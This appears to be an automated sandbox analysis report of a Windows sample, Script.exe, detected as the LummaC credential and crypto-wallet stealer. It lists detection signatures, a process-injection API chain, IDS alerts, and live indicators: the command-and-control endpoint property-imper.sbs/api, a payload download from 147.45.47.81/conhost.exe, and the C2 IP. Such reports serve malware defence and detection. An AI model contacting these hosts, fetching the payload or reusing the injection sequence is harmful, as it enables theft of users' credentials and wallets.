Edit tour

Windows Analysis Report
Script.exe

Overview

General Information

Sample name:	Script.exe
Analysis ID:	1561303
MD5:	e9c36f6a03694c88081409d38d76b9e8
SHA1:	59356b5d0918fd2c402ebfff702846100d02a7f1
SHA256:	980a90b7a738a090f4775800a3de183f2e9d94ce54f882e443c2d01105badb4d
Tags:	exeuser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Script.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\Script.exe" MD5: E9C36F6A03694C88081409D38D76B9E8)

conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 4616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2214373366.0000000002EA6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2214338243.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Script.exe PID: 7120	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 768	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 768	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 768	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 6 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T03:11:08.080599+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.21.33.116	443	TCP
2024-11-23T03:11:10.417761+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.33.116	443	TCP
2024-11-23T03:11:12.715388+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.33.116	443	TCP
2024-11-23T03:11:14.940552+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	104.21.33.116	443	TCP
2024-11-23T03:11:17.297654+0100	2028371	3	Unknown Traffic	192.168.2.5	49714	104.21.33.116	443	TCP
2024-11-23T03:11:19.787711+0100	2028371	3	Unknown Traffic	192.168.2.5	49717	104.21.33.116	443	TCP
2024-11-23T03:11:22.208787+0100	2028371	3	Unknown Traffic	192.168.2.5	49718	104.21.33.116	443	TCP
2024-11-23T03:11:26.257251+0100	2028371	3	Unknown Traffic	192.168.2.5	49732	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T03:11:08.987788+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.33.116	443	TCP
2024-11-23T03:11:11.170907+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49706	104.21.33.116	443	TCP
2024-11-23T03:11:26.990618+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49732	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T03:11:08.987788+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T03:11:11.170907+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49706	104.21.33.116	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T03:11:20.533321+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49717	104.21.33.116	443	TCP

HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81

Source: global traffic

DNS traffic detected: DNS query: property-imper.sbs

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs

Source: aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/
Source: aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exe
Source: aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exeR
Source: aspnet_regiis.exe, 00000003.00000002.2525039530.0000000002EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exet
Source: aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/v
Source: aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81:80/conhost.exeicrosoft
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000003.00000003.2278969823.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microh
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2524937110.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143157759.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/
Source: aspnet_regiis.exe, 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/$
Source: aspnet_regiis.exe, 00000003.00000003.2164739586.00000000051BE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164630592.00000000051B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164351137.00000000051B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/(
Source: aspnet_regiis.exe, 00000003.00000002.2524937110.0000000002E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/R
Source: aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/Z
Source: aspnet_regiis.exe, 00000003.00000003.2214338243.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2279021640.00000000051D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api
Source: aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api;I
Source: aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apiN
Source: aspnet_regiis.exe, 00000003.00000003.2252014610.00000000051D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523832590.00000000051D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2525465526.00000000051D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235406120.00000000051D5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2279021640.00000000051D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apiZuV
Source: aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apic
Source: aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/b
Source: aspnet_regiis.exe, 00000003.00000003.2251568762.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2252261385.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235233881.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235371345.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/pi
Source: aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/api
Source: aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/apiK
Source: aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/apiicrosoft
Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49732 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: Script.exe

Static PE information: section name: )UHMIO

PE file has nameless sections

Source: Script.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0B8F60 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,NtGetContextThread,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,CreateProcessW,NtGetContextThread,NtCreateThreadEx,CloseHandle,CloseHandle,NtGetContextThread,		0_2_6E0B8F60
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0B7510 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,GetModuleHandleW,		0_2_6E0B7510

Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009A2E89	0_2_009A2E89
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009E1A80	0_2_009E1A80
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009E2480	0_2_009E2480
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009E26B0	0_2_009E26B0
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009EF2B0	0_2_009EF2B0
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009FB4B0	0_2_009FB4B0
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009F60E0	0_2_009F60E0
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009C8240	0_2_009C8240
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009CB660	0_2_009CB660
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009FDE60	0_2_009FDE60
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009CB380	0_2_009CB380
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009F6310	0_2_009F6310
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009CBB00	0_2_009CBB00
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009E2120	0_2_009E2120
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009FE320	0_2_009FE320
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0B8F60	0_2_6E0B8F60
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0B7510	0_2_6E0B7510
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0B1970	0_2_6E0B1970
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0B1000	0_2_6E0B1000
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0CA841	0_2_6E0CA841
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0C0850	0_2_6E0C0850
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0B8930	0_2_6E0B8930
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0B51E0	0_2_6E0B51E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02E498ED	3_3_02E498ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02E47C6B	3_3_02E47C6B

Source: C:\Users\user\Desktop\Script.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1224

Source: Script.exe, 00000000.00000002.2391650388.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Script.exe
Source: Script.exe, 00000000.00000000.2086868585.00000000009A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNathanEleanorBenjamin.hDwYT vs Script.exe
Source: Script.exe	Binary or memory string: OriginalFilenameNathanEleanorBenjamin.hDwYT vs Script.exe

Source: Script.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Script.exe

